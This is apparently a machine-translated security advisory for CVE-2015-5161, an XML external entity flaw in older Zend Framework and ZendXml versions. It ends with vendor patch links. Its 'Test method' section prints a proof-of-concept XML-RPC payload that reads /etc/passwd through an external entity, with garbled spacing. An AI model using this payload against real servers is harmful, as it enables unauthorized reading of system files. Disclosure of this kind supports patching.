XML external entity Injection Vulnerability (CVE-2015-5161) for multiple Zend Products)

XML external entity Injection Vulnerability (CVE-2015-5161) for multiple Zend Products)
XML external entity Injection Vulnerability (CVE-2015-5161) for multiple Zend Products)

Release date:
Updated on:

Affected Systems:

Zend Zend Framework < 2.5.2
Zend Zend Framework < 2.4.6
Zend Zend Framework < 1.12.14
Zend ZendXml < 1.0.1

Description:

Bugtraq id: 76177
CVE (CAN) ID: CVE-2015-5161

Zend Framework (ZF) is an open-source PHP5 development Framework that can be used to develop web programs and services.

Zend_Xml_Security: scan of some ZendXml and Zend Framework versions. When running in a PHP-FPM in a thread environment, remote attackers can exploit multi-byte encoding characters, attackers can exploit this vulnerability to bypass security checks and perform XXE and XEE attacks.

<* Source: Dawid Golunski
*>

Test method:

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!

<? Xml version = "1.0" encoding = "UTF-8"?>
<! DOCTYPE methodCall [
<! ENTITY pocdata SYSTEM "file: // etc/passwd">
]>
<MethodCall>
<MethodName> retrieved: & pocdata; </methodName>
</MethodCall>

Suggestion:

Vendor patch:

Zend
----
The vendor has released a patch to fix this security problem. Please download it from the vendor's homepage:

Http://framework.zend.com/security/advisory/ZF2015-06

Https://www.exploit-db.com/exploits/37765/

This article permanently updates the link address: